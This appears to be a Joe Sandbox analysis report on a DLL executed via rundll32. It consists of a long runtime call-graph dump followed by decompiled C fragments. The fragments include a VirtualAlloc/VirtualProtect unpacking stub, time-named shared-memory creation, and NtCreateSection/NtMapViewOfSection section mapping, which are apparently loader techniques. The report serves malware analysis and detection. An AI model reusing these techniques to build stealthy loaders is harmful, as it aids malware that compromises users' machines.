19696->19699 19697->19688 19698->19688 19700 70008298 19699->19700 19700->19688 19710 70001a42 19701->19710 19703 7000179e ___scrt_release_startup_lock 19703->19690 19705 70001bd2 19704->19705 19709 70001be8 19705->19709 19727 70008c28 19705->19727 19707 70001be0 19708 70005ee5 ___vcrt_uninitialize 8 API calls 19707->19708 19708->19709 19709->19684 19715 70008c58 19710->19715 19713 700060af ___vcrt_uninitialize_ptd 6 API calls 19714 70005f09 19713->19714 19714->19703 19718 700098fe 19715->19718 19719 70001a49 19718->19719 19720 70009908 19718->19720 19719->19713 19722 70009d49 19720->19722 19723 70009bd4 _Atexit 5 API calls 19722->19723 19724 70009d65 19723->19724 19725 70009d80 TlsFree 19724->19725 19726 70009d6e 19724->19726 19726->19719 19728 70008c33 19727->19728 19729 70008c45 ___scrt_uninitialize_crt 19727->19729 19730 70008c41 19728->19730 19732 700100e2 19728->19732 19729->19707 19730->19707 19735 7000ff90 19732->19735 19738 7000fee4 19735->19738 19739 7000fef0 ___FrameUnwindToState 19738->19739 19746 70006cec RtlEnterCriticalSection 19739->19746 19741 7000fefa ___scrt_uninitialize_crt 19742 7000ff66 19741->19742 19747 7000fe58 19741->19747 19755 7000ff84 19742->19755 19746->19741 19748 7000fe64 ___FrameUnwindToState 19747->19748 19758 7000d34b RtlEnterCriticalSection 19748->19758 19750 7000fe6e ___scrt_uninitialize_crt 19751 7000fea7 19750->19751 19759 7001009a 19750->19759 19769 7000fed8 19751->19769 19889 70006d34 RtlLeaveCriticalSection 19755->19889 19757 7000ff72 19757->19730 19758->19750 19760 700100b0 19759->19760 19761 700100a7 19759->19761 19772 70010035 19760->19772 19762 7000ff90 ___scrt_uninitialize_crt 62 API calls 19761->19762 19765 700100ad 19762->19765 19765->19751 19767 700100cc 19783 70013848 19767->19783 19888 7000d35f RtlLeaveCriticalSection 19769->19888 19771 7000fec6 19771->19741 19773 70010072 19772->19773 19774 7001004d 19772->19774 19773->19765 19778 7000d210 19773->19778 19774->19773 19775 7000d210 ___scrt_uninitialize_crt 14 API 
calls 19774->19775 19776 7001006b 19775->19776 19792 7001403e 19776->19792 19779 7000d231 19778->19779 19780 7000d21c 19778->19780 19779->19767 19781 70006ddb __Wcscoll 14 API calls 19780->19781 19782 7000d221 __cftoe 19781->19782 19782->19767 19784 70013866 19783->19784 19785 70013859 19783->19785 19787 700138af 19784->19787 19789 7001388d 19784->19789 19786 70006ddb __Wcscoll 14 API calls 19785->19786 19791 7001385e __cftoe 19786->19791 19788 70006ddb __Wcscoll 14 API calls 19787->19788 19788->19791 19859 700137a6 19789->19859 19791->19765 19793 7001404a ___FrameUnwindToState 19792->19793 19794 70014052 19793->19794 19795 7001406a 19793->19795 19796 70006dc8 __dosmaperr 14 API calls 19794->19796 19797 70014105 19795->19797 19801 7001409c 19795->19801 19798 70014057 19796->19798 19799 70006dc8 __dosmaperr 14 API calls 19797->19799 19800 70006ddb __Wcscoll 14 API calls 19798->19800 19802 7001410a 19799->19802 19806 7001405f __cftoe 19800->19806 19815 70012cfb RtlEnterCriticalSection 19801->19815 19804 70006ddb __Wcscoll 14 API calls 19802->19804 19804->19806 19805 700140a2 19807 700140d3 19805->19807 19808 700140be 19805->19808 19806->19773 19816 70014130 19807->19816 19810 70006ddb __Wcscoll 14 API calls 19808->19810 19812 700140c3 19810->19812 19811 700140ce 19856 700140fd 19811->19856 19813 70006dc8 __dosmaperr 14 API calls 19812->19813 19813->19811 19815->19805 19817 70014152 19816->19817 19826 70014163 __cftoe 19816->19826 19818 70014156 19817->19818 19820 700141a6 19817->19820 19819 70006dc8 __dosmaperr 14 API calls 19818->19819 19821 7001415b 19819->19821 19822 700141b9 19820->19822 19824 70014ac9 ___scrt_uninitialize_crt 16 API calls 19820->19824 19823 70006ddb __Wcscoll 14 API calls 19821->19823 19825 70013cd7 ___scrt_uninitialize_crt 34 API calls 19822->19825 19823->19826 19824->19822 19827 700141ca 19825->19827 19826->19811 19828 700141cf 19827->19828 19829 7001420e 19827->19829 19832 700141f8 19828->19832 19837 700141d3 19828->19837 19830 70014222 
19829->19830 19831 70014267 WriteFile 19829->19831 19835 70014257 19830->19835 19836 7001422d 19830->19836 19833 7001428b GetLastError 19831->19833 19838 700141ee 19831->19838 19834 700138c5 ___scrt_uninitialize_crt 39 API calls 19832->19834 19833->19838 19834->19838 19842 70013d48 ___scrt_uninitialize_crt 6 API calls 19835->19842 19839 70014232 19836->19839 19840 70014247 19836->19840 19837->19838 19841 70013c6f ___scrt_uninitialize_crt 6 API calls 19837->19841 19838->19826 19844 700142b1 19838->19844 19845 700142db 19838->19845 19839->19838 19846 70013e23 ___scrt_uninitialize_crt 6 API calls 19839->19846 19843 70013f0c ___scrt_uninitialize_crt 7 API calls 19840->19843 19841->19838 19842->19838 19843->19838 19847 700142b8 19844->19847 19848 700142cf 19844->19848 19845->19826 19849 70006ddb __Wcscoll 14 API calls 19845->19849 19846->19838 19850 70006ddb __Wcscoll 14 API calls 19847->19850 19851 70006da5 __dosmaperr 14 API calls 19848->19851 19852 700142f3 19849->19852 19853 700142bd 19850->19853 19851->19826 19854 70006dc8 __dosmaperr 14 API calls 19852->19854 19855 70006dc8 __dosmaperr 14 API calls 19853->19855 19854->19826 19855->19826 19857 70012d1e ___scrt_uninitialize_crt RtlLeaveCriticalSection 19856->19857 19858 70014103 19857->19858 19858->19806 19860 700137b2 ___FrameUnwindToState 19859->19860 19873 70012cfb RtlEnterCriticalSection 19860->19873 19862 700137c1 19863 70013808 19862->19863 19874 70012dd2 19862->19874 19865 70006ddb __Wcscoll 14 API calls 19863->19865 19867 7001380d 19865->19867 19866 700137ed FlushFileBuffers 19866->19867 19868 700137f9 19866->19868 19885 7001383c 19867->19885 19869 70006dc8 __dosmaperr 14 API calls 19868->19869 19871 700137fe GetLastError 19869->19871 19871->19863 19873->19862 19875 70012ddf 19874->19875 19877 70012df4 19874->19877 19876 70006dc8 __dosmaperr 14 API calls 19875->19876 19879 70012de4 19876->19879 19878 70006dc8 __dosmaperr 14 API calls 19877->19878 19880 70012e19 19877->19880 19881 70012e24 19878->19881 19882 
70006ddb __Wcscoll 14 API calls 19879->19882 19880->19866 19883 70006ddb __Wcscoll 14 API calls 19881->19883 19884 70012dec __cftoe 19882->19884 19883->19884 19884->19866 19886 70012d1e ___scrt_uninitialize_crt RtlLeaveCriticalSection 19885->19886 19887 70013825 19886->19887 19887->19791 19888->19771 19889->19757 19197 700082b9 19198 700082d0 19197->19198 19204 700082c9 __cftoe 19197->19204 19199 700082f1 19198->19199 19200 700082db 19198->19200 19219 7000f956 19199->19219 19202 70006ddb __Wcscoll 14 API calls 19200->19202 19202->19204 19209 70008566 14 API calls 19210 7000834c 19209->19210 19211 70008361 19210->19211 19212 70008355 19210->19212 19214 700083ef 33 API calls 19211->19214 19213 70006ddb __Wcscoll 14 API calls 19212->19213 19218 7000835a 19213->19218 19216 70008379 19214->19216 19215 700074e6 _free 14 API calls 19215->19204 19217 700074e6 _free 14 API calls 19216->19217 19216->19218 19217->19218 19218->19215 19220 700082f7 19219->19220 19221 7000f95f 19219->19221 19225 7000f397 GetModuleFileNameW 19220->19225 19241 70009783 19221->19241 19226 7000f3c6 GetLastError 19225->19226 19227 7000f3d7 19225->19227 19228 70006da5 __dosmaperr 14 API calls 19226->19228 19229 7000f1a9 33 API calls 19227->19229 19232 7000f3d2 19228->19232 19230 7000f408 19229->19230 19401 7000f2d0 19230->19401 19233 70001592 ctype 4 API calls 19232->19233 19234 7000830a 19233->19234 19235 700083ef 19234->19235 19237 70008414 19235->19237 19236 700074ce __Getcvt 33 API calls 19236->19237 19237->19236 19239 70008474 19237->19239 19238 7000833f 19238->19209 19239->19238 19240 700074ce __Getcvt 33 API calls 19239->19240 19240->19239 19242 70009794 19241->19242 19243 7000978e 19241->19243 19244 70009dc7 _Atexit 6 API calls 19242->19244 19265 7000979a 19242->19265 19245 70009d88 _Atexit 6 API calls 19243->19245 19246 700097ae 19244->19246 19245->19242 19247 70007341 __Getctype 14 API calls 19246->19247 19246->19265 19249 700097be 19247->19249 19248 70007827 ___FrameUnwindToState 33 API 
calls 19250 7000981c 19248->19250 19251 700097c6 19249->19251 19252 700097db 19249->19252 19254 70009dc7 _Atexit 6 API calls 19251->19254 19255 70009dc7 _Atexit 6 API calls 19252->19255 19253 70009813 19266 7000f79d 19253->19266 19262 700097d2 19254->19262 19256 700097e7 19255->19256 19257 700097fa 19256->19257 19258 700097eb 19256->19258 19260 700094c8 _Atexit 14 API calls 19257->19260 19259 70009dc7 _Atexit 6 API calls 19258->19259 19259->19262 19263 70009805 19260->19263 19261 700074e6 _free 14 API calls 19261->19265 19262->19261 19264 700074e6 _free 14 API calls 19263->19264 19264->19265 19265->19248 19265->19253 19267 7000f8b6 __cftoe 33 API calls 19266->19267 19268 7000f7b0 19267->19268 19285 7000f546 19268->19285 19271 7000f7c9 19271->19220 19272 70007520 __Wcsxfrm 15 API calls 19273 7000f7da 19272->19273 19284 7000f80c 19273->19284 19292 7000f9b1 19273->19292 19276 700074e6 _free 14 API calls 19278 7000f81a 19276->19278 19277 7000f807 19279 70006ddb __Wcscoll 14 API calls 19277->19279 19278->19220 19279->19284 19280 7000f84e 19280->19284 19303 7000f438 19280->19303 19281 7000f822 19281->19280 19282 700074e6 _free 14 API calls 19281->19282 19282->19280 19284->19276 19286 700073c2 __cftoe 33 API calls 19285->19286 19287 7000f558 19286->19287 19288 7000f567 GetOEMCP 19287->19288 19289 7000f579 19287->19289 19290 7000f590 19288->19290 19289->19290 19291 7000f57e GetACP 19289->19291 19290->19271 19290->19272 19291->19290 19293 7000f546 35 API calls 19292->19293 19294 7000f9d1 19293->19294 19296 7000fa0b IsValidCodePage 19294->19296 19300 7000fa47 ___scrt_fastfail 19294->19300 19295 70001592 ctype 4 API calls 19297 7000f7ff 19295->19297 19298 7000fa1d 19296->19298 19296->19300 19297->19277 19297->19281 19299 7000fa4c GetCPInfo 19298->19299 19301 7000fa26 ___scrt_fastfail 19298->19301 19299->19300 19299->19301 19300->19295 19311 7000f61c 19301->19311 19304 7000f444 ___FrameUnwindToState 19303->19304 19379 70006cec RtlEnterCriticalSection 19304->19379 19306 
7000f44e 19380 7000f485 19306->19380 19312 7000f644 GetCPInfo 19311->19312 19321 7000f70d 19311->19321 19313 7000f65c 19312->19313 19312->19321 19322 7000a306 19313->19322 19314 70001592 ctype 4 API calls 19316 7000f79b 19314->19316 19316->19300 19320 7000a5f3 37 API calls 19320->19321 19321->19314 19323 700073c2 __cftoe 33 API calls 19322->19323 19324 7000a326 19323->19324 19325 7000e88f __fassign MultiByteToWideChar 19324->19325 19327 7000a353 19325->19327 19326 7000a3e4 19328 70001592 ctype 4 API calls 19326->19328 19327->19326 19330 70007520 __Wcsxfrm 15 API calls 19327->19330 19333 7000a379 std::_Locinfo::_Locinfo_ctor ___scrt_fastfail 19327->19333 19331 7000a407 19328->19331 19329 7000a3de 19332 70000e81 __freea 14 API calls 19329->19332 19330->19333 19337 7000a5f3 19331->19337 19332->19326 19333->19329 19334 7000e88f __fassign MultiByteToWideChar 19333->19334 19335 7000a3c7 19334->19335 19335->19329 19336 7000a3ce GetStringTypeW 19335->19336 19336->19329 19338 700073c2 __cftoe 33 API calls 19337->19338 19339 7000a606 19338->19339 19342 7000a409 19339->19342 19343 7000a424 19342->19343 19344 7000e88f __fassign MultiByteToWideChar 19343->19344 19347 7000a468 19344->19347 19345 7000a5cd 19346 70001592 ctype 4 API calls 19345->19346 19348 7000a5e0 19346->19348 19347->19345 19349 70007520 __Wcsxfrm 15 API calls 19347->19349 19354 7000a48d std::_Locinfo::_Locinfo_ctor 19347->19354 19348->19320 19349->19354 19350 7000a532 19353 70000e81 __freea 14 API calls 19350->19353 19351 7000e88f __fassign MultiByteToWideChar 19352 7000a4d3 19351->19352 19352->19350 19370 70009f46 19352->19370 19353->19345 19354->19350 19354->19351 19357 7000a541 19359 70007520 __Wcsxfrm 15 API calls 19357->19359 19363 7000a553 std::_Locinfo::_Locinfo_ctor 19357->19363 19358 7000a509 19358->19350 19360 70009f46 std::_Locinfo::_Locinfo_ctor 6 API calls 19358->19360 19359->19363 19360->19350 19361 7000a5be 19362 70000e81 __freea 14 API calls 19361->19362 19362->19350 19363->19361 19364 70009f46 
std::_Locinfo::_Locinfo_ctor 6 API calls 19363->19364 19365 7000a59b 19364->19365 19365->19361 19366 7000e90b std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19365->19366 19367 7000a5b5 19366->19367 19367->19361 19368 7000a5ea 19367->19368 19369 70000e81 __freea 14 API calls 19368->19369 19369->19350 19376 70009ad9 19370->19376 19373 70009fa3 std::_Locinfo::_Locinfo_ctor 5 API calls 19374 70009f97 LCMapStringW 19373->19374 19375 70009f57 19374->19375 19375->19350 19375->19357 19375->19358 19377 70009bd4 _Atexit 5 API calls 19376->19377 19378 70009aef 19377->19378 19378->19373 19378->19375 19379->19306 19390 7000fba4 19380->19390 19382 7000f4a7 19383 7000fba4 14 API calls 19382->19383 19384 7000f4c6 19383->19384 19385 7000f45b 19384->19385 19386 700074e6 _free 14 API calls 19384->19386 19387 7000f479 19385->19387 19386->19385 19400 70006d34 RtlLeaveCriticalSection 19387->19400 19389 7000f467 19389->19284 19391 7000fbb5 19390->19391 19398 7000fbb1 __cftoe __Wcsxfrm 19390->19398 19392 7000fbbc 19391->19392 19394 7000fbcf ___scrt_fastfail 19391->19394 19393 70006ddb __Wcscoll 14 API calls 19392->19393 19393->19398 19395 7000fc06 19394->19395 19396 7000fbfd 19394->19396 19394->19398 19395->19398 19399 70006ddb __Wcscoll 14 API calls 19395->19399 19397 70006ddb __Wcscoll 14 API calls 19396->19397 19397->19398 19398->19382 19399->19398 19400->19389 19402 7000f2ec 19401->19402 19403 7000f2dd 19401->19403 19404 7000f2f4 19402->19404 19405 7000f319 19402->19405 19403->19232 19404->19403 19422 70007cec 19404->19422 19406 7000e90b std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19405->19406 19408 7000f329 19406->19408 19409 7000f330 GetLastError 19408->19409 19410 7000f346 19408->19410 19411 70006da5 __dosmaperr 14 API calls 19409->19411 19412 7000f357 19410->19412 19414 70007cec 14 API calls 19410->19414 19413 7000f33c 19411->19413 19412->19403 19415 7000e90b std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19412->19415 19416 70006ddb __Wcscoll 14 API calls 19413->19416 
19414->19412 19417 7000f36f 19415->19417 19416->19403 19417->19403 19418 7000f376 GetLastError 19417->19418 19419 70006da5 __dosmaperr 14 API calls 19418->19419 19420 7000f382 19419->19420 19421 70006ddb __Wcscoll 14 API calls 19420->19421 19421->19403 19423 70007cf7 19422->19423 19424 70006ddb __Wcscoll 14 API calls 19423->19424 19425 70007d00 19424->19425 19425->19403 16652 700015c6 16653 700015d1 16652->16653 16654 70001604 dllmain_crt_process_detach 16652->16654 16655 700015f6 dllmain_crt_process_attach 16653->16655 16656 700015d6 16653->16656 16661 700015e0 16654->16661 16655->16661 16657 700015ec 16656->16657 16658 700015db 16656->16658 16667 700019c0 16657->16667 16658->16661 16662 700019df 16658->16662 16675 70008c20 16662->16675 16782 70005ecf 16667->16782 16670 700019c9 16670->16661 16673 700019dc 16673->16661 16674 70005eda 21 API calls 16674->16670 16681 7000969a 16675->16681 16678 70005eda 16747 70005fa4 16678->16747 16682 700096a4 16681->16682 16683 700019e4 16681->16683 16684 70009d88 _Atexit 6 API calls 16682->16684 16683->16678 16685 700096ab 16684->16685 16685->16683 16686 70009dc7 _Atexit 6 API calls 16685->16686 16687 700096be 16686->16687 16689 70009561 16687->16689 16690 7000956c 16689->16690 16694 7000957c 16689->16694 16695 70009582 16690->16695 16693 700074e6 _free 14 API calls 16693->16694 16694->16683 16696 7000959d 16695->16696 16697 70009597 16695->16697 16699 700074e6 _free 14 API calls 16696->16699 16698 700074e6 _free 14 API calls 16697->16698 16698->16696 16700 700095a9 16699->16700 16701 700074e6 _free 14 API calls 16700->16701 16702 700095b4 16701->16702 16703 700074e6 _free 14 API calls 16702->16703 16704 700095bf 16703->16704 16705 700074e6 _free 14 API calls 16704->16705 16706 700095ca 16705->16706 16707 700074e6 _free 14 API calls 16706->16707 16708 700095d5 16707->16708 16709 700074e6 _free 14 API calls 16708->16709 16710 700095e0 16709->16710 16711 700074e6 _free 14 API calls 16710->16711 16712 700095eb 16711->16712 16713 

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,000006C4,00003000,00000040,000006C4,7004A3C0), ref: 7004AA2A
                    • VirtualAlloc.KERNEL32(00000000,0000003E,00003000,00000040,7004A41F), ref: 7004AA61
                    • VirtualAlloc.KERNEL32(00000000,00011426,00003000,00000040), ref: 7004AAC1
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7004AAF7
                    • VirtualProtect.KERNEL32(6FFA0000,00000000,00000004,7004A94C), ref: 7004ABFC
                    • VirtualProtect.KERNEL32(6FFA0000,00001000,00000004,7004A94C), ref: 7004AC23
                    • VirtualProtect.KERNEL32(00000000,?,00000002,7004A94C), ref: 7004ACF0
                    • VirtualProtect.KERNEL32(00000000,?,00000002,7004A94C,?), ref: 7004AD46
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7004AD62
                    Memory Dump Source
                    • Source File: 00000017.00000002.882581732.000000007004A000.00000040.00000001.01000000.0000000C.sdmp, Offset: 7004A000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7004a000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$Protect$Alloc$Free
                    • String ID:
                    • API String ID: 2574235972-0
                    • Opcode ID: 2a6d906b896be9674878654af31795075e0e483536a4b99ab448420acfd02bd9
                    • Instruction ID: 66020e3fabe3816e431a5534d1c565300b21a6bd2d7ffa864c9e8c5b6a7741f7
                    • Opcode Fuzzy Hash: 2a6d906b896be9674878654af31795075e0e483536a4b99ab448420acfd02bd9
                    • Instruction Fuzzy Hash: B3D182765401009FEB95DF14CA90F5537A6FF8B710B0E10A8ED0A5FA5AD7B1A830DBAC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 82%
                    			E6FFA14FE(intOrPtr _a4) {
                    				void _v316;
                    				signed int _v332;
                    				long _v344;
                    				long _v348;
                    				char _v356;
                    				char _v360;
                    				long _v364;
                    				long _v368;
                    				void* __edi;
                    				long _t25;
                    				long _t28;
                    				long _t31;
                    				long _t32;
                    				long _t36;
                    				void* _t42;
                    				intOrPtr _t44;
                    				intOrPtr _t49;
                    				long _t50;
                    				void* _t56;
                    				signed int _t59;
                    				signed int _t60;
                    				void* _t62;
                    				intOrPtr* _t63;
                    
                    				_t25 = E6FFA1F7C();
                    				_v348 = _t25;
                    				if(_t25 != 0) {
                    					L18:
                    					return _t25;
                    				} else {
                    					goto L1;
                    				}
                    				do {
                    					L1:
                    					_v344 = 0;
                    					_t28 = NtQuerySystemInformation(8,  &_v316, 0x138,  &_v344); // executed
                    					_t50 = _t28;
                    					_t59 = 0x13;
                    					_t11 = _t50 + 1; // 0x1
                    					_t60 = _v332 % _t59 + _t11;
                    					_t31 = E6FFA1B8C(0, _t60); // executed
                    					_v368 = _t31;
                    					Sleep(_t60 << 4); // executed
                    					_t25 = _v368;
                    				} while (_t25 == 9);
                    				if(_t25 != 0) {
                    					goto L18;
                    				}
                    				_t32 = E6FFA195C(_t50); // executed
                    				_v364 = _t32;
                    				if(_t32 != 0) {
                    					L16:
                    					_t25 = _v364;
                    					if(_t25 == 0xffffffff) {
                    						_t25 = GetLastError();
                    					}
                    					goto L18;
                    				}
                    				if(_a4 != 0) {
                    					L11:
                    					_push(0);
                    					_t62 = E6FFA1D2D(E6FFA1768,  &_v356);
                    					if(_t62 == 0) {
                    						_v368 = GetLastError();
                    					} else {
                    						_t36 = WaitForSingleObject(_t62, 0xffffffff);
                    						_v368 = _t36;
                    						if(_t36 == 0) {
                    							GetExitCodeThread(_t62,  &_v368);
                    						}
                    						CloseHandle(_t62);
                    					}
                    					goto L16;
                    				}
                    				if(E6FFA1637(_t50,  &_v360) != 0) {
                    					 *0x6ffa41b8 = 0;
                    					goto L11;
                    				}
                    				_t49 = _v360;
                    				_t63 = __imp__GetLongPathNameW;
                    				_t42 =  *_t63(_t49, 0, 0); // executed
                    				_t56 = _t42;
                    				if(_t56 == 0) {
                    					L9:
                    					 *0x6ffa41b8 = _t49;
                    					goto L11;
                    				}
                    				_t19 = _t56 + 2; // 0x2
                    				_t44 = E6FFA1D8B(_t56 + _t19);
                    				 *0x6ffa41b8 = _t44;
                    				if(_t44 == 0) {
                    					goto L9;
                    				} else {
                    					 *_t63(_t49, _t44, _t56); // executed
                    					E6FFA1E7C(_t49);
                    					goto L11;
                    				}
                    			}

                    APIs
                      • Part of subcall function 6FFA1F7C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6FFA1512,747863F0,00000000), ref: 6FFA1F8B
                      • Part of subcall function 6FFA1F7C: GetVersion.KERNEL32 ref: 6FFA1F9A
                      • Part of subcall function 6FFA1F7C: GetCurrentProcessId.KERNEL32 ref: 6FFA1FA9
                      • Part of subcall function 6FFA1F7C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6FFA1FC2
                    • NtQuerySystemInformation.NTDLL ref: 6FFA1535
                      • Part of subcall function 6FFA1B8C: VirtualAlloc.KERNELBASE(00000000,6FFA1552,00003000,00000004,?,?,6FFA1552,00000001), ref: 6FFA1BE2
                      • Part of subcall function 6FFA1B8C: memcpy.NTDLL(?,?,6FFA1552,?,?,6FFA1552,00000001), ref: 6FFA1C7D
                      • Part of subcall function 6FFA1B8C: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6FFA1552,00000001), ref: 6FFA1C98
                    • Sleep.KERNELBASE(00000001,00000001), ref: 6FFA155A
                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6FFA15A2
                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6FFA15C0
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,6FFA1768,?,00000000), ref: 6FFA15F2
                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6FFA1606
                    • CloseHandle.KERNEL32(00000000), ref: 6FFA160D
                    • GetLastError.KERNEL32(6FFA1768,?,00000000), ref: 6FFA1615
                    • GetLastError.KERNEL32 ref: 6FFA1628
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastLongNamePathProcessVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleInformationObjectOpenQuerySingleSleepSystemThreadVersionWaitmemcpy
                    • String ID:
                    • API String ID: 2016936029-0
                    • Opcode ID: e738555fa212b1b217565ff8eb03c43d3f85c483dfe490115f09cf577c5190f5
                    • Instruction ID: 7ef5bfe1d142bbae6db805f09c1ed7540757b3285b9aec7abdbc95e071c51865
                    • Opcode Fuzzy Hash: e738555fa212b1b217565ff8eb03c43d3f85c483dfe490115f09cf577c5190f5
                    • Instruction Fuzzy Hash: 8C31B272904715EBD701DF248844A5FBBECFF86764F06092AF521C7290EB32D5188FA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 69%
                    			E6FFA10ED(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                    				intOrPtr _v12;
                    				struct _FILETIME* _v16;
                    				short _v60;
                    				struct _FILETIME* _t14;
                    				intOrPtr _t15;
                    				long _t18;
                    				void* _t19;
                    				void* _t22;
                    				intOrPtr _t31;
                    				long _t32;
                    				void* _t34;
                    
                    				_t31 = __edx;
                    				_t14 =  &_v16;
                    				GetSystemTimeAsFileTime(_t14);
                    				_push(0x192);
                    				_push(0x54d38000);
                    				_push(_v12);
                    				_push(_v16);
                    				L6FFA2220();
                    				_push(_t14);
                    				_v16 = _t14;
                    				_t15 =  *0x6ffa41d0;
                    				_push(_t15 + 0x6ffa505e);
                    				_push(_t15 + 0x6ffa5054);
                    				_push(0x16);
                    				_push( &_v60);
                    				_v12 = _t31;
                    				L6FFA221A();
                    				_t18 = _a4;
                    				if(_t18 == 0) {
                    					_t18 = 0x1000;
                    				}
                    				_t19 = CreateFileMappingW(0xffffffff, 0x6ffa41c0, 4, 0, _t18,  &_v60); // executed
                    				_t34 = _t19;
                    				if(_t34 == 0) {
                    					_t32 = GetLastError();
                    				} else {
                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                    						if(_t22 == 0) {
                    							_t32 = GetLastError();
                    							if(_t32 != 0) {
                    								goto L9;
                    							}
                    						} else {
                    							 *_a8 = _t34;
                    							 *_a12 = _t22;
                    							_t32 = 0;
                    						}
                    					} else {
                    						_t32 = 2;
                    						L9:
                    						CloseHandle(_t34);
                    					}
                    				}
                    				return _t32;
                    			}

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?,?), ref: 6FFA10FA
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6FFA1110
                    • _snwprintf.NTDLL ref: 6FFA1135
                    • CreateFileMappingW.KERNELBASE(000000FF,6FFA41C0,00000004,00000000,?,?), ref: 6FFA115A
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?), ref: 6FFA1171
                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6FFA1185
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?), ref: 6FFA119D
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A), ref: 6FFA11A6
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?), ref: 6FFA11AE
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID:
                    • API String ID: 1724014008-0
                    • Opcode ID: dfab742cbf00fdabb4e9e9c6977c5ef6e95fe715dd09c0dbaaafb519c6557402
                    • Instruction ID: 92d45d045020312153f9100dc86cd2a2fdbbc283d696bd6b40702ac6f87e8d1c
                    • Opcode Fuzzy Hash: dfab742cbf00fdabb4e9e9c6977c5ef6e95fe715dd09c0dbaaafb519c6557402
                    • Instruction Fuzzy Hash: B721CFB2600108FFDB12AFA8CC85EDE7BBCEF49364F128126F615D7290D6729954CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 72%
                    			E6FFA1382(intOrPtr* __eax, void** _a4) {
                    				int _v12;
                    				void* _v16;
                    				void* _v20;
                    				void* _v24;
                    				int _v28;
                    				int _v32;
                    				intOrPtr _v36;
                    				int _v40;
                    				int _v44;
                    				void* _v48;
                    				void* __esi;
                    				long _t34;
                    				void* _t39;
                    				void* _t47;
                    				intOrPtr* _t48;
                    
                    				_t48 = __eax;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v24 =  *((intOrPtr*)(__eax + 4));
                    				_v16 = 0;
                    				_v12 = 0;
                    				_v48 = 0x18;
                    				_v44 = 0;
                    				_v36 = 0x40;
                    				_v40 = 0;
                    				_v32 = 0;
                    				_v28 = 0;
                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                    				if(_t34 < 0) {
                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                    				} else {
                    					 *_t48 = _v16;
                    					_t39 = E6FFA1B4A(_t48,  &_v12); // executed
                    					_t47 = _t39;
                    					if(_t47 != 0) {
                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                    					} else {
                    						memset(_v12, 0, _v24);
                    						 *_a4 = _v12;
                    					}
                    				}
                    				return _t47;
                    			}

                    APIs
                    • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6FFA13DF
                      • Part of subcall function 6FFA1B4A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6FFA13F4,00000002,00000000,?,?,00000000,?,?,6FFA13F4,00000000), ref: 6FFA1B77
